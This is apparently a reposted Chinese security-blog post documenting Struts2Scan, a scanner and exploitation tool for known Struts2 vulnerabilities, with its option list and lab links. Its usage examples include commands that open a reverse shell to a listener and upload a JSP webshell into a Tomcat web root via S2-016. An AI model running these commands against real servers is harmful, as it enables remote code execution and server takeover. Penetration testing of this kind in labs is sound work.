Struts2利用工具
2022-10-9 08:33:3 Author: 天驿安全(查看原文) 阅读量:40 收藏

Struts2漏洞利用扫描工具,基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具。

参数说明

Options:
  -i, --info 漏洞信息介绍
  -v, --version 显示工具版本
  -u, --url TEXT URL地址
  -n, --name TEXT 指定漏洞名称, 漏洞名称详见info
  -f, --file TEXT 批量扫描URL文件, 一行一个URL
  -d, --data TEXT POST参数, 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp}
  -c, --encode TEXT 页面编码, 默认UTF-8编码
  -p, --proxy TEXT HTTP代理. 格式为http://ip:port
  -t, --timeout TEXT HTTP超时时间, 默认10s
  -w, --workers TEXT 批量扫描进程数, 默认为10个进程
  --header TEXT HTTP请求头, 格式为: key1=value1&key2=value2
  -e, --exec 进入命令执行shell
  --webpath 获取WEB路径
  -r, --reverse TEXT 反弹shell地址, 格式为ip:port
  --upfile TEXT 需要上传的文件路径和名称
  --uppath TEXT 上传的目录和名称, 如: /usr/local/tomcat/webapps/ROOT/shell.jsp
  -q, --quiet 关闭打印不存在漏洞的输出,只保留存在漏洞的输出
  -h, --help Show this message and exit.

使用例举

单个URL漏洞检测
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action

批量漏洞检测
python3 Struts2Scan.py -f urls.txt

POST数据
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action -d name=admin&email=admin&age={exp}

指定漏洞名称利用
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action -n S2-016 --exec

反弹shll
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action -n S2-016 --reverse 192.168.8.8:8888

上传shell
python3 Struts2Scan.py -u http://192.168.8.168:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp

漏洞测试环境

https://github.com/Medicean/VulApps/tree/master/s/struts2/
https://github.com/vulhub/vulhub/tree/master/struts2
# 基于Vulhub开源漏洞靶场,集合很多漏洞环境

免责声明 

合一安全部分内容及图片源自网络转载,版权归作者及授权人所有,若您发现有侵害您的权利,请联系我们进行删除处理。谢谢 !


文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNjIxNDQyMQ==&mid=2247492942&idx=1&sn=ca67b61731bc775db7a6d2df2906c76a&chksm=c151e2b4f6266ba25baa455b9e981e85055d285c090aa5587c3b8c53b01830529a59cd7ac17d#rd
如有侵权请联系:admin#unsafe.sh